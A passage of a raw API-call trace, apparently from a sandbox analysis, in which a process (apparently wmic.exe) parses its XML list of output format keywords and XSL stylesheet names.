IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.121] free (_Block=0x35c6a0) [0246.121] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0246.121] malloc (_Size=0x18) returned 0x35c6a0 [0246.121] malloc (_Size=0x18) returned 0x35c6c0 [0246.121] SysStringLen (param_1="HFORM") returned 0x5 [0246.121] SysStringLen (param_1="TABLE") returned 0x5 [0246.121] SysStringLen (param_1="HFORM") returned 0x5 [0246.121] SysStringLen (param_1="LIST") returned 0x4 [0246.121] SysStringLen (param_1="HFORM") returned 0x5 [0246.121] SysStringLen (param_1="HTABLE") returned 0x6 [0246.121] malloc (_Size=0x30) returned 0x3581c0 [0246.121] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.122] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.122] IUnknown:Release (This=0x22da280) returned 0x0 [0246.122] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=6, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.122] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="xml.xsl") returned 0x0 [0246.122] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.122] malloc (_Size=0x18) returned 0x35c6e0 [0246.122] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.122] free (_Block=0x35c6e0) [0246.122] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0246.122] malloc (_Size=0x18) returned 0x35c6e0 [0246.122] malloc (_Size=0x18) returned 0x35c700 [0246.122] SysStringLen (param_1="XML") returned 0x3 [0246.122] SysStringLen (param_1="TABLE") returned 0x5 [0246.122] SysStringLen (param_1="XML") returned 0x3 [0246.122] SysStringLen (param_1="VALUE") returned 0x5 [0246.122] SysStringLen (param_1="VALUE") returned 0x5 [0246.122] SysStringLen (param_1="XML") returned 0x3 [0246.122] malloc (_Size=0x30) returned 0x358200 [0246.122] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.122] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.122] IUnknown:Release (This=0x22da280) returned 0x0 [0246.122] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=7, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.122] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="mof.xsl") returned 0x0 [0246.122] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.123] malloc (_Size=0x18) returned 0x35c720 [0246.123] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.123] free (_Block=0x35c720) [0246.123] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0246.123] malloc (_Size=0x18) returned 0x35c720 [0246.123] malloc (_Size=0x18) returned 0x35c740 [0246.123] SysStringLen (param_1="MOF") returned 0x3 [0246.123] SysStringLen (param_1="TABLE") returned 0x5 [0246.123] SysStringLen (param_1="MOF") returned 0x3 [0246.123] SysStringLen (param_1="LIST") returned 0x4 [0246.123] SysStringLen (param_1="MOF") returned 0x3 [0246.123] SysStringLen (param_1="RAWXML") returned 0x6 [0246.123] SysStringLen (param_1="LIST") returned 0x4 [0246.123] SysStringLen (param_1="MOF") returned 0x3 [0246.123] malloc (_Size=0x30) returned 0x358240 [0246.123] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.123] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.123] IUnknown:Release (This=0x22da280) returned 0x0 [0246.123] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=8, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.124] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="csv.xsl") returned 0x0 [0246.124] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.124] malloc (_Size=0x18) returned 0x35c760 [0246.124] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.124] free (_Block=0x35c760) [0246.124] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0246.124] malloc (_Size=0x18) returned 0x35c760 [0246.124] malloc (_Size=0x18) returned 0x35c780 [0246.124] SysStringLen (param_1="CSV") returned 0x3 [0246.124] SysStringLen (param_1="TABLE") returned 0x5 [0246.124] SysStringLen (param_1="CSV") returned 0x3 [0246.124] SysStringLen (param_1="LIST") returned 0x4 [0246.124] SysStringLen (param_1="CSV") returned 0x3 [0246.124] SysStringLen (param_1="HTABLE") returned 0x6 [0246.124] SysStringLen (param_1="CSV") returned 0x3 [0246.124] SysStringLen (param_1="HFORM") returned 0x5 [0246.124] malloc (_Size=0x30) returned 0x358280 [0246.125] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.125] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.125] IUnknown:Release (This=0x22da280) returned 0x0 [0246.125] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=9, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.125] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.125] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.125] malloc (_Size=0x18) returned 0x35c7a0 [0246.125] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.125] free (_Block=0x35c7a0) [0246.125] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0246.125] malloc (_Size=0x18) returned 0x35c7a0 [0246.125] malloc (_Size=0x18) returned 0x35c7c0 [0246.125] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.125] SysStringLen (param_1="TABLE") returned 0x5 [0246.125] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.125] SysStringLen (param_1="VALUE") returned 0x5 [0246.125] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.125] SysStringLen (param_1="XML") returned 0x3 [0246.125] SysStringLen (param_1="XML") returned 0x3 [0246.125] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.126] malloc (_Size=0x30) returned 0x3582c0 [0246.126] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.126] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.126] IUnknown:Release (This=0x22da280) returned 0x0 [0246.126] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=10, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.126] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.126] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.126] malloc (_Size=0x18) returned 0x35c7e0 [0246.126] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.126] free (_Block=0x35c7e0) [0246.126] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0246.126] malloc (_Size=0x18) returned 0x35c7e0 [0246.126] malloc (_Size=0x18) returned 0x35c800 [0246.127] SysStringLen (param_1="texttablewsys") returned 0xd [0246.127] SysStringLen (param_1="TABLE") returned 0x5 [0246.127] SysStringLen (param_1="texttablewsys") returned 0xd [0246.127] SysStringLen (param_1="XML") returned 0x3 [0246.127] SysStringLen (param_1="texttablewsys") returned 0xd [0246.127] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.127] SysStringLen (param_1="XML") returned 0x3 [0246.127] SysStringLen (param_1="texttablewsys") returned 0xd [0246.127] malloc (_Size=0x30) returned 0x358300 [0246.127] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.127] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.127] IUnknown:Release (This=0x22da280) returned 0x0 [0246.127] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=11, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.127] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.127] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.127] malloc (_Size=0x18) returned 0x35c820 [0246.127] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.128] free (_Block=0x35c820) [0246.128] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0246.128] malloc (_Size=0x18) returned 0x35c820 [0246.128] malloc (_Size=0x18) returned 0x35c840 [0246.128] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.128] SysStringLen (param_1="TABLE") returned 0x5 [0246.128] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.128] SysStringLen (param_1="XML") returned 0x3 [0246.128] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.128] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.128] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.128] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.128] malloc (_Size=0x30) returned 0x358340 [0246.129] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.129] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.129] IUnknown:Release (This=0x22da280) returned 0x0 [0246.129] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=12, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.129] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.129] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.129] malloc (_Size=0x18) returned 0x35c860 [0246.129] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.129] free (_Block=0x35c860) [0246.129] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0246.129] malloc (_Size=0x18) returned 0x35c860 [0246.129] malloc (_Size=0x18) returned 0x35c880 [0246.129] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.129] SysStringLen (param_1="TABLE") returned 0x5 [0246.130] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.130] SysStringLen (param_1="XML") returned 0x3 [0246.130] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.130] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.130] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.130] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.130] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.130] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.130] malloc (_Size=0x30) returned 0x358380 [0246.130] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.130] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.130] IUnknown:Release (This=0x22da280) returned 0x0 [0246.130] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=13, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.130] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.130] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.130] malloc (_Size=0x18) returned 0x35c8a0 [0246.130] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.131] free (_Block=0x35c8a0) [0246.131] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0246.131] malloc (_Size=0x18) returned 0x35c8a0 [0246.131] malloc (_Size=0x18) returned 0x35c8c0 [0246.131] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.131] SysStringLen (param_1="TABLE") returned 0x5 [0246.131] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.131] SysStringLen (param_1="XML") returned 0x3 [0246.131] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.131] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.131] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.131] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.131] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.131] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.131] malloc (_Size=0x30) returned 0x3583c0 [0246.131] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.131] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.131] IUnknown:Release (This=0x22da280) returned 0x0 [0246.131] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=14, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.132] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="texttable.xsl") returned 0x0 [0246.132] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.132] malloc (_Size=0x18) returned 0x35c8e0 [0246.132] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.132] free (_Block=0x35c8e0) [0246.132] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0246.132] malloc (_Size=0x18) returned 0x35c8e0 [0246.132] malloc (_Size=0x18) returned 0x35c900 [0246.132] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0246.132] SysStringLen (param_1="TABLE") returned 0x5 [0246.132] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0246.132] SysStringLen (param_1="XML") returned 0x3 [0246.132] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0246.132] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.132] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0246.132] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.132] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0246.132] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.132] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.132] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0246.132] malloc (_Size=0x30) returned 0x358400 [0246.132] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.133] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.133] IUnknown:Release (This=0x22da280) returned 0x0 [0246.133] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=15, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.133] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="htable.xsl") returned 0x0 [0246.133] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.133] malloc (_Size=0x18) returned 0x35c920 [0246.133] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.133] free (_Block=0x35c920) [0246.133] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0246.133] malloc (_Size=0x18) returned 0x35c920 [0246.133] malloc (_Size=0x18) returned 0x35c940 [0246.133] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0246.133] SysStringLen (param_1="TABLE") returned 0x5 [0246.133] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0246.133] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.133] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0246.133] SysStringLen (param_1="XML") returned 0x3 [0246.133] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0246.133] SysStringLen (param_1="texttablewsys") returned 0xd [0246.134] SysStringLen (param_1="XML") returned 0x3 [0246.134] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0246.134] malloc (_Size=0x30) returned 0x358440 [0246.134] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.134] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.134] IUnknown:Release (This=0x22da280) returned 0x0 [0246.134] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=16, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.134] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="htable.xsl") returned 0x0 [0246.134] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.134] malloc (_Size=0x18) returned 0x35c960 [0246.134] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.134] free (_Block=0x35c960) [0246.134] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0246.134] malloc (_Size=0x18) returned 0x35c960 [0246.134] malloc (_Size=0x18) returned 0x35c980 [0246.134] SysStringLen (param_1="htable-sortby") returned 0xd [0246.134] SysStringLen (param_1="TABLE") returned 0x5 [0246.134] SysStringLen (param_1="htable-sortby") returned 0xd [0246.135] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.135] SysStringLen (param_1="htable-sortby") returned 0xd [0246.135] SysStringLen (param_1="XML") returned 0x3 [0246.135] SysStringLen (param_1="htable-sortby") returned 0xd [0246.135] SysStringLen (param_1="texttablewsys") returned 0xd [0246.135] SysStringLen (param_1="htable-sortby") returned 0xd [0246.135] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0246.135] SysStringLen (param_1="XML") returned 0x3 [0246.135] SysStringLen (param_1="htable-sortby") returned 0xd [0246.135] malloc (_Size=0x30) returned 0x358480 [0246.135] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.135] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.135] IUnknown:Release (This=0x22da280) returned 0x0 [0246.135] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=17, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.135] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="mof.xsl") returned 0x0 [0246.135] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.136] malloc (_Size=0x18) returned 0x35c9a0 [0246.136] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.136] free (_Block=0x35c9a0) [0246.136] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0246.136] malloc (_Size=0x18) returned 0x35c9a0 [0246.136] malloc (_Size=0x18) returned 0x35c9c0 [0246.136] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0246.136] SysStringLen (param_1="TABLE") returned 0x5 [0246.136] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0246.136] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.136] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0246.136] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.136] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0246.136] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.137] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.137] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0246.137] malloc (_Size=0x30) returned 0x3584c0 [0246.137] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.137] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.137] IUnknown:Release (This=0x22da280) returned 0x0 [0246.137] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=18, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.137] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="mof.xsl") returned 0x0 [0246.137] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.137] malloc (_Size=0x18) returned 0x35c9e0 [0246.137] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.137] free (_Block=0x35c9e0) [0246.137] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0246.137] malloc (_Size=0x18) returned 0x35c9e0 [0246.137] malloc (_Size=0x18) returned 0x35ca00 [0246.137] SysStringLen (param_1="wmiclimofformat") returned 0xf [0246.138] SysStringLen (param_1="TABLE") returned 0x5 [0246.138] SysStringLen (param_1="wmiclimofformat") returned 0xf [0246.138] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.138] SysStringLen (param_1="wmiclimofformat") returned 0xf [0246.138] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.138] SysStringLen (param_1="wmiclimofformat") returned 0xf [0246.138] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0246.138] SysStringLen (param_1="wmiclimofformat") returned 0xf [0246.138] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0246.138] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.138] SysStringLen (param_1="wmiclimofformat") returned 0xf [0246.138] malloc (_Size=0x30) returned 0x358500 [0246.138] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.138] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.138] IUnknown:Release (This=0x22da280) returned 0x0 [0246.138] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=19, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.138] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="textvaluelist.xsl") returned 0x0 [0246.138] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.138] malloc (_Size=0x18) returned 0x35ca20 [0246.138] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.139] free (_Block=0x35ca20) [0246.139] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0246.139] malloc (_Size=0x18) returned 0x35ca20 [0246.139] malloc (_Size=0x18) returned 0x35ca40 [0246.139] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0246.139] SysStringLen (param_1="TABLE") returned 0x5 [0246.139] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0246.139] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.139] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0246.139] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0246.139] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0246.139] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.139] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0246.139] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0246.139] malloc (_Size=0x30) returned 0x358540 [0246.139] IUnknown:Release (This=0x22dbd50) returned 0x0 [0246.139] IUnknown:Release (This=0x22d78d0) returned 0x0 [0246.139] IUnknown:Release (This=0x22da280) returned 0x0 [0246.139] IXMLDOMNodeList:get_item (in: This=0x22d9cc0, index=20, listItem=0x26f7b0 | out: listItem=0x26f7b0*=0x22dbd50) returned 0x0 [0246.139] IXMLDOMNode:get_text (in: This=0x22dbd50, text=0x26f7c0 | out: text=0x26f7c0*="textvaluelist.xsl") returned 0x0 [0246.139] IXMLDOMNode:get_attributes (in: This=0x22dbd50, attributeMap=0x26f7b8 | out: attributeMap=0x26f7b8*=0x22d78d0) returned 0x0 [0246.140] malloc (_Size=0x18) returned 0x35ca60 [0246.140] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x22d78d0, name="KEYWORD", namedItem=0x26f7c8 | out: namedItem=0x26f7c8*=0x22da280) returned 0x0 [0246.140] free (_Block=0x35ca60) [0246.140] IXMLDOMNode:get_nodeValue (in: This=0x22da280, value=0x26f800 | out: value=0x26f800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0246.140] malloc (_Size=0x18) returned 0x35ca60 [0246.140] malloc (_Size=0x18) returned 0x35ca80 [0246.140] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0246.140] SysStringLen (param_1="TABLE") returned 0x5 [0246.140] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0246.140] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0246.140] 